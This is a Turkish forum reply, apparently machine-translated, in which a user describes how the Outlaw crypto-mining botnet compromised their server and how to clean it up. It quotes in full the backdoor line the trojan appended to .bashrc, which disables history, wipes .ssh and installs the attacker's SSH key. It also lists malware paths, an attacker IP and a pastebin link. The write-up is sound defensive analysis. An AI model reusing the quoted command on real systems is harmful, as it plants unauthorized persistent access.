Aynısı bana da oldu ve dün fark ettim. Dosyayı kontrol ettim /var/log/syslog
ve bu IP (185.234.218.40) otomatik olarak cronjobs yürütüyor gibi görünüyordu.
Http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) adresinden kontrol ettim ve bazı raporları var. Bu dosyalar trojan tarafından düzenlendi:
- Bashrc
- .ssh / authorized_keys
Bunu .bashrc
(bash her açıldığında yürütülür) sonunda buldum :
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Bu sizin siliyor authorized_keys
şifre olmadan bağlanmasına izin verilen SSH anahtarlarının bir listesi dosyası. Sonra saldırganın SSH anahtarını ekler:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Ayrıca, bu klasörü buldum:, /tmp/.X13-unix/.rsync
tüm kötü amaçlı yazılımın bulunduğu yer. Büyük /tmp/.X13-unix/.rsync/c/ip
olasılıkla diğer kurbanlar veya düğüm sunucuları olan 70 000 IP adresi içeren bir dosya bile buldum .
2 çözüm var: A:
22 numaralı bağlantı noktası ve gerekli bulduğunuz diğerleri dışındaki tüm giden bağlantıları engelleyen ve X başarısız parola girişiminden sonra bir IP adresini yasaklayan bir program olan fail2ban'ı engelleyen bir güvenlik duvarı ekleyin
Tüm cron işlerini öldür:
ps aux | grep cron
sonra ortaya çıkan PID'yi öldür
Parolanızı güvenli bir parola ile değiştirin.
B:
İhtiyacınız olan veya istediğiniz tüm dosyaları veya klasörleri yedekleyin
Sunucuyu sıfırlayın ve Ubuntu'yu yeniden yükleyin veya doğrudan yeni bir damlacık oluşturun
Thom Wiggers'ın dediği gibi, kesinlikle bir bitcoin madenciliği botnetinin bir parçasısınız ve sunucunuz bir arka kapıya sahip . Arka kapı, burada bulunan bir dosyayı kullanan bir perl istisnası kullanır:, /tmp/.X13-unix/.rsync/b/run
bunu içeren ( https://pastebin.com/ceP2jsUy )
Bulduğum en şüpheli klasörler şunlardı:
/tmp/.X13-unix/.rsync
~/.bashrc
(düzenlendi)
~/.firefoxcatche
Son olarak, Perl Backdoor ile ilgili bir makale var:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Umarım bunu faydalı buluyorsunuz.
.firefoxcatche
muhtemelen firefox ile ilgisi yok - bu sadece bir bitcoin madenci olabilir mi? Çalıştırılabilir dosyaları virustotal'a yüklemeyi deneyin.